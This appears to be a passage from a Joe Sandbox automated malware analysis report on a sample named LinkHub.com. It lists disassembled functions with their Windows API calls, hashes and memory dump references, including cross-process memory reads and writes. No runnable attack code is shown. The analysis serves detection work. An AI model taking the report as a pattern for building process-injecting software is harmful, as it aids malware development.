                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CF2
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CFF
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270D0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 00fd8d04d733fcff917baa2efef79085c692cca58fa33baac3480e1be6f30a56
                                                                                        • Instruction ID: e502ce0cf8de6f78102738208c027c0193be157206ea945d9c47c07df8a5c007
                                                                                        • Opcode Fuzzy Hash: 00fd8d04d733fcff917baa2efef79085c692cca58fa33baac3480e1be6f30a56
                                                                                        • Instruction Fuzzy Hash: 75019C72810B16DFCB31AFA6D9C0816FAF9BE502153158A3FD19A52921C7B0A968DE80
                                                                                        Function 002665AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002665BF
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 002665D6
                                                                                        • MessageBeep.USER32(00000000), ref: 002665EE
                                                                                        • KillTimer.USER32(?,0000040A), ref: 0026660A
                                                                                        • EndDialog.USER32(?,00000001), ref: 00266624
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: c2dd162f2e014c7b6821db3f63f9bed70926beec00816b49e88562555d66c8ea
                                                                                        • Instruction ID: 8661ae2d0a082b7dfc75657cfdd74de986ef7b0f408c803a4046a27b4a5511cc
                                                                                        • Opcode Fuzzy Hash: c2dd162f2e014c7b6821db3f63f9bed70926beec00816b49e88562555d66c8ea
                                                                                        • Instruction Fuzzy Hash: F9018630910304ABEB305F10FE4EB967B7CFB00705F00055AA187A10E1DBF4AAA49E90
                                                                                        Function 0023DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0023DAD2
                                                                                          • Part of subcall function 00232D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?), ref: 00232D4E
                                                                                          • Part of subcall function 00232D38: GetLastError.KERNEL32(?,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?,?), ref: 00232D60
                                                                                        • _free.LIBCMT ref: 0023DAE4
                                                                                        • _free.LIBCMT ref: 0023DAF6
                                                                                        • _free.LIBCMT ref: 0023DB08
                                                                                        • _free.LIBCMT ref: 0023DB1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 02670464eba455c3fc59dd9b28f8c903b6b3709f0b26594f155f8844938dc924
                                                                                        • Instruction ID: f0f99284cea3073f49020aa4fd4c0ee109efa2119ebce01033707620849ae944
                                                                                        • Opcode Fuzzy Hash: 02670464eba455c3fc59dd9b28f8c903b6b3709f0b26594f155f8844938dc924
                                                                                        • Instruction Fuzzy Hash: 87F01DB2564209ABC624EF68FA86D1AB7EEFE04710BA50C19F149D7511CB30FCA08A64
                                                                                        Function 00232610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0023262E
                                                                                          • Part of subcall function 00232D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?), ref: 00232D4E
                                                                                          • Part of subcall function 00232D38: GetLastError.KERNEL32(?,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?,?), ref: 00232D60
                                                                                        • _free.LIBCMT ref: 00232640
                                                                                        • _free.LIBCMT ref: 00232653
                                                                                        • _free.LIBCMT ref: 00232664
                                                                                        • _free.LIBCMT ref: 00232675
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: c5b444388ad0b3e7de5073b0dc1d81e246212c4a5341a5fed908b90e485fa036
                                                                                        • Instruction ID: e6d3592c24b9600444e6aab7cd0e7480104d30400864cfbc8758c55f56af8fdb
                                                                                        • Opcode Fuzzy Hash: c5b444388ad0b3e7de5073b0dc1d81e246212c4a5341a5fed908b90e485fa036
                                                                                        • Instruction Fuzzy Hash: DAF0DAB4C23625DB8702AF64FD0A8483B68FB247517050A1BF91496AB5C7318D2AAF94
                                                                                        Function 002312B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: __freea$_free
                                                                                        • String ID: a/p$am/pm
                                                                                        • API String ID: 3432400110-3206640213
                                                                                        • Opcode ID: 426023c5c31537f0814e699fec6cf110f12107198b05188bd7438a65e6b139f7
                                                                                        • Instruction ID: ff46c9ddd483e2e48a0619ba99711b0f5353d14c22e5e3e9ddeb7dc04e820ee3
                                                                                        • Opcode Fuzzy Hash: 426023c5c31537f0814e699fec6cf110f12107198b05188bd7438a65e6b139f7
                                                                                        • Instruction Fuzzy Hash: DBD1E1F19302079BDB289FA8C8567BAB7B5FF05700F28415AE9029B250D7759DB0CFA1
                                                                                        Function 00285231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002741FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274229
                                                                                          • Part of subcall function 002741FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274239
                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00285419
                                                                                        • VariantInit.OLEAUT32(?), ref: 0028550E
                                                                                        • VariantClear.OLEAUT32(?), ref: 002855CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                        • String ID: bn&
                                                                                        • API String ID: 2854431205-2640381320
                                                                                        • Opcode ID: c5a8a193806b4b0efd0231c9632d1ddf95c3a24f001d97aea18ecb0a80a7d6e2
                                                                                        • Instruction ID: 124620c3516a3ea66c0a4518648ca1c590ae0cc00f8ff324ff3808afd022db43
                                                                                        • Opcode Fuzzy Hash: c5a8a193806b4b0efd0231c9632d1ddf95c3a24f001d97aea18ecb0a80a7d6e2
                                                                                        • Instruction Fuzzy Hash: 5DD17F74920649DFCB18EF94C4D1AEEBBB8FF48304F54405DE406AB292DB31A9A6CF50
                                                                                        Function 0020CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0020D253
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID: t5-$t5-$t5-
                                                                                        • API String ID: 1385522511-1268989708
                                                                                        • Opcode ID: 532b2ff50eb963892d8e927f27d925b3e92d379590b09b4fcb3c5faceaaada56
                                                                                        • Instruction ID: 26c882f7bb4a4763db9cbd5a881b89ebf9d4376c40650a3c1ce81feefac5a79d
                                                                                        • Opcode Fuzzy Hash: 532b2ff50eb963892d8e927f27d925b3e92d379590b09b4fcb3c5faceaaada56
                                                                                        • Instruction Fuzzy Hash: E6915BB5A21306DFCB14CF98D4806A9B7F2FF58300F60815AD84997382D771ADA2CF90
                                                                                        Function 002861A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                        • String ID: CALLARGARRAY$bn&
                                                                                        • API String ID: 157775604-4124307206
                                                                                        • Opcode ID: 8fc33cabd96a9ce7fc2bed71b5e2dac890a73561788e2274847ee9e84298bcf4
                                                                                        • Instruction ID: 06a7280c26141b9190cdbcb75913f54fec73c0d090314740592f43cbd4439787
                                                                                        • Opcode Fuzzy Hash: 8fc33cabd96a9ce7fc2bed71b5e2dac890a73561788e2274847ee9e84298bcf4
                                                                                        • Instruction Fuzzy Hash: 7641D475E21219DFCB00EFA4C8899EEBBB5FF58324F10415AE805A7291D7719DA1CF90
                                                                                        Function 00263063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0026BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00262B1D,?,?,00000034,00000800,?,00000034), ref: 0026BDF4
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002630AD
                                                                                          • Part of subcall function 0026BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00262B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0026BDBF
                                                                                          • Part of subcall function 0026BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0026BD1C
                                                                                          • Part of subcall function 0026BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00262AE1,00000034,?,?,00001004,00000000,00000000), ref: 0026BD2C
                                                                                          • Part of subcall function 0026BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00262AE1,00000034,?,?,00001004,00000000,00000000), ref: 0026BD42
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0026311A
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00263167
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: e84b671af0fcc8afdf652e1ca857d6438cdbf49cc32ac637ae5a9700e0c81175
                                                                                        • Instruction ID: 2de510a00e85946e23205e3f9982b435c185b90d8360a5cbfb461f30e211386e
                                                                                        • Opcode Fuzzy Hash: e84b671af0fcc8afdf652e1ca857d6438cdbf49cc32ac637ae5a9700e0c81175
                                                                                        • Instruction Fuzzy Hash: 27411972900218AEDB11DFA4CD85ADEBBB8EF49700F004095FA45BB181DB706F95CF60
                                                                                        Function 00231A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00231AD9
                                                                                        • _free.LIBCMT ref: 00231BA4
                                                                                        • _free.LIBCMT ref: 00231BAE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                                        • API String ID: 2506810119-1604394757
                                                                                        • Opcode ID: ac6c491e2d19e60da15b5ba9112dc1446d7705d1a95d65bdfa0c5ac153a2b5a1
                                                                                        • Instruction ID: cafdc37737852fa15dad3289c9142bcd0564703b17de233bb8464fe9a877888a
                                                                                        • Opcode Fuzzy Hash: ac6c491e2d19e60da15b5ba9112dc1446d7705d1a95d65bdfa0c5ac153a2b5a1
                                                                                        • Instruction Fuzzy Hash: 11318FB1E21219EBCB21DF99DC85D9EBBBDEF84714F1040A6F80497251E7B08E64CB90
                                                                                        Function 0026CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0026CBB1
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0026CBF7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002D29C0,00AC6728), ref: 0026CC40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                        • String ID: 0
                                                                                        • API String ID: 135850232-4108050209
                                                                                        • Opcode ID: 294b014e845aa863d6ab3f4ca0932ff1210ae43f11c88b080b4907b28256ff37
                                                                                        • Instruction ID: 589853665acbb48086624bd97706c67302f0bac4eaa837356f9adaccdab2ad89
                                                                                        • Opcode Fuzzy Hash: 294b014e845aa863d6ab3f4ca0932ff1210ae43f11c88b080b4907b28256ff37
                                                                                        • Instruction Fuzzy Hash: DA41B2312143029FDB20EF24D885B2ABBE8EF84714F244A1EF4A9972D1D734E994CB52
                                                                                        Function 00294EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0029DCD0,00000000,?,?,?,?), ref: 00294F48
                                                                                        • GetWindowLongW.USER32 ref: 00294F65
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00294F75
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 260a774cc3a5936fc25d1f225aacb9b19b8693e3dacfb30b35479f08a658f699
                                                                                        • Instruction ID: f770034fa8fb98cc69002624a9f920dc2c48f83570e07e9b5ad8ca24e8d8e582
                                                                                        • Opcode Fuzzy Hash: 260a774cc3a5936fc25d1f225aacb9b19b8693e3dacfb30b35479f08a658f699
                                                                                        • Instruction Fuzzy Hash: A5319C31224206AFDF219E78DC45FEA77A9EF09324F204715F979A21E0D770AC619B50
                                                                                        Function 00283AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00283DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00283AD4,?,?), ref: 00283DD5
                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00283AD7
                                                                                        • _wcslen.LIBCMT ref: 00283AF8
                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00283B63
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 946324512-2422070025
                                                                                        • Opcode ID: dd5ff698d359784806e524c4206547508ac406b52dd03b2625e37ba6fe7962cd
                                                                                        • Instruction ID: 5ff70e9842975fdd5cf35e6d2b2debf581d02b8172c5a18f167e18d3ec11bd48
                                                                                        • Opcode Fuzzy Hash: dd5ff698d359784806e524c4206547508ac406b52dd03b2625e37ba6fe7962cd
                                                                                        • Instruction Fuzzy Hash: A231D3BD2112029FCB10EF68C5C5EA977E0EF14728F248159E8168B3D2D771EE55CB60
                                                                                        Function 00294954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002949DC
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002949F0
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00294A14
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: 13509f87fb11f374b2118300068bdf4a6a4a0d24b6d844ccede9f469c602cbc8
                                                                                        • Instruction ID: fae17412f3402bb8248d5be8800757d7d0533d40a66d3bf4cb8a34e061fcc4f8
                                                                                        • Opcode Fuzzy Hash: 13509f87fb11f374b2118300068bdf4a6a4a0d24b6d844ccede9f469c602cbc8
                                                                                        • Instruction Fuzzy Hash: B521BF32620219ABDF119F94DC46FEB3B69EF48718F110214FA15AB1D0D6B1AC62DB90
                                                                                        Function 002950F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002951A3
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002951B1
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002951B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
